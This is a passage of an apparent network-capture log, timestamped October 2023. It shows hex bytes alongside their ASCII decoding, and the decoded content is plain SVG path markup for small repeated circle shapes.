                                                                                                                                                                                                                                                        Data Ascii: 3,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7087INData Raw: 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 38 38 2c 32 39 36 2e 31 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38
                                                                                                                                                                                                                                                        Data Ascii: 1-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M780.88,296.17a1.72,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M78
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7103INData Raw: 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 37 33 2c 31 39 38 2e 33 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c
                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,.15,2.86"></path><path class="cls-4" d="M798.73,198.39a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7119INData Raw: 64 3d 22 4d 38 33 30 2e 31 39 2c 32 39 34 2e 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 35 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                                                                                                        Data Ascii: d="M830.19,294.5a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.95,2.38,2.38,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7135INData Raw: 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: .72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7151INData Raw: 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70
                                                                                                                                                                                                                                                        Data Ascii: ,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></p
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7167INData Raw: 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 37 2e 31 32 2c 31 38 38 2e 31 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c
                                                                                                                                                                                                                                                        Data Ascii: 2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M897.12,188.12a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7183INData Raw: 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 35 38 2c 32 38 34 2e 32 33 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35
                                                                                                                                                                                                                                                        Data Ascii: 11,0,0,1,.15,2.85"></path><path class="cls-4" d="M928.58,284.23a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.5
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7199INData Raw: 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                                                                                                        Data Ascii: .69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7215INData Raw: 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                                                                                                        Data Ascii: ,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7231INData Raw: 2e 35 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                        Data Ascii: .59a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7247INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 35 39 2c 32 32 37 2e 35 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c
                                                                                                                                                                                                                                                        Data Ascii: th><path class="cls-4" d="M959.59,227.54a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7263INData Raw: 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 30 36 2c 31 34 36 2e 35 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32
                                                                                                                                                                                                                                                        Data Ascii: 08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.06,146.54a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7279INData Raw: 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2c 32 35 36 2e 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c
                                                                                                                                                                                                                                                        Data Ascii: ,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912,256.5a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7295INData Raw: 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                        Data Ascii: ,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path cla
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7311INData Raw: 37 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: 7-2.2,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7327INData Raw: 2d 34 22 20 64 3d 22 4d 38 33 33 2e 35 36 2c 31 39 37 2e 36 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c
                                                                                                                                                                                                                                                        Data Ascii: -4" d="M833.56,197.63a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7343INData Raw: 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 31 36 2e 34 34 2c 33 30 37 2e 35 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32
